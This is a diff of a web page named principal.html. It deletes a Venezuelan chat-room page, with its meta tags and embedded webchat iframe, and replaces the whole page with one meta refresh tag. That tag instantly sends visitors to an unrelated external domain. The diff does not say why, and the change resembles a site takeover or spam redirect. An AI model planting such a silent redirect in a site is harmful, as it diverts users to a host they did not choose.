--- a/principal.html
+++ b/principal.html
@@ -1,17 +1,1 @@
-<html>
-
-<head>
-<title>Chat Venezuela Gratis : Chatear con amigos de Latinchat ElClubVenezuela.Com</title>
-<META NAME="Description" CONTENT="Haz amigos en el Chat Venezuela gratis, para poder conocer gente de Venezuela, empieza a chatear y busca el amor en nuestros chat">
-<meta name="keywords" content="Chat SALA GENRAL,El Club Venezuela, Chat Venezuela,Chat En Venezuela,Chat de Venezuela,Chat Venezolano,mi punto,chat de cantv,el chat venezuela,chat venezuela online,chatear venezuela,chat mipunto,chat,recargas de saldo,movistar,movilnet,digitel,directv colombiano,simpletv,netuno,inter,cantv,netflix,disney plus, amazom prime vide,coepoelec,aguas de merida">
-<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
-<meta http-equiv="Content-Language" content="es">
-<link rel="canonical" href="https://www.elchatvenezuela.com/elchat.php" />
-
-</head>
-
-<body topmargin="1" leftmargin="1" rightmargin="1" bottommargin="1">
-
-<center>
-<iframe id="webchat" border="0" frameborder="0" height="602" name="webchat" scrolling="no" src="https://chat.chatealo.cl/?nick=ElChatVzla-??&amp;channel=#ElChatVenezuela,#Venezuela" target="_blank" width="1137">
-</iframe>
+<meta content='0; URL=https://easyproweb.softwarescorpion.com' HTTP-EQUIV='Refresh'/>
